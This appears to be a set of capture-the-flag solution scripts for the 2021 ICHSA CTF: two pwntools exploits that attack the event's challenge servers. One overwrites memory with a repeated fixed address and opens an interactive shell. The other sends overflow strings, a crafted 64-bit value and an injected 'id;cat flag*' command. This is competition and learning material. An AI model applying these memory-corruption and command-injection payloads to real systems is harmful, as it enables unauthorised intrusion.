2021 ICHASA CTF

README.md

https://ctftime.org/event/1359

COP.py

from pwn import *

# p = process('./game')
p = remote('cop.ichsa.ctf.today', 8011)

for i in range(0x90):
    p.sendlineafter('Please chose an option', '2')
    p.sendlineafter('Please chose an option', '2')

payload = b'aaaaaa' + p64(0x401813)*16
payload = payload.ljust(1023, b'a')

p.sendlineafter('Please chose an option', '5')
p.sendafter('new username:', payload)

for i in range(8):
    p.sendlineafter('Please chose an option', '3')
    p.sendlineafter('Please', str(0xfc))


p.sendlineafter('Please chose an option', '4')

p.sendlineafter('Please chose an option', '3')
p.sendlineafter('Please', str(0x3c))

p.sendlineafter('Please chose an option', '2')
p.sendlineafter('Please chose an option', '1')

p.interactive()

EpicGame.py

from pwn import *
import sys

while True:
    # p = process('./app2.out', env={'LD_PRELOAD': './libc.so.6'})
    p = remote('epic_game.ichsa.ctf.today', 8007)

    try:
        p.sendlineafter(':', '1')
        p.sendlineafter(':', 'id;cat flag*')

        for i in range(0x10):
            p.sendlineafter(':', 'a'*62)

        p.sendlineafter(':', 'b'*23)
        p.sendlineafter(':', p64(0xffffffffffffff4f))

        p.sendlineafter(':', p64(int(f'0x89c0', 16)))

        res = p.recvall(1)
        if len(res) != 884:
            print(len(res))
            print(res)
        else:
            sys.stdout.write('N')
        p.close()

    except Exception as e:
        p.close()
        print('Error', e)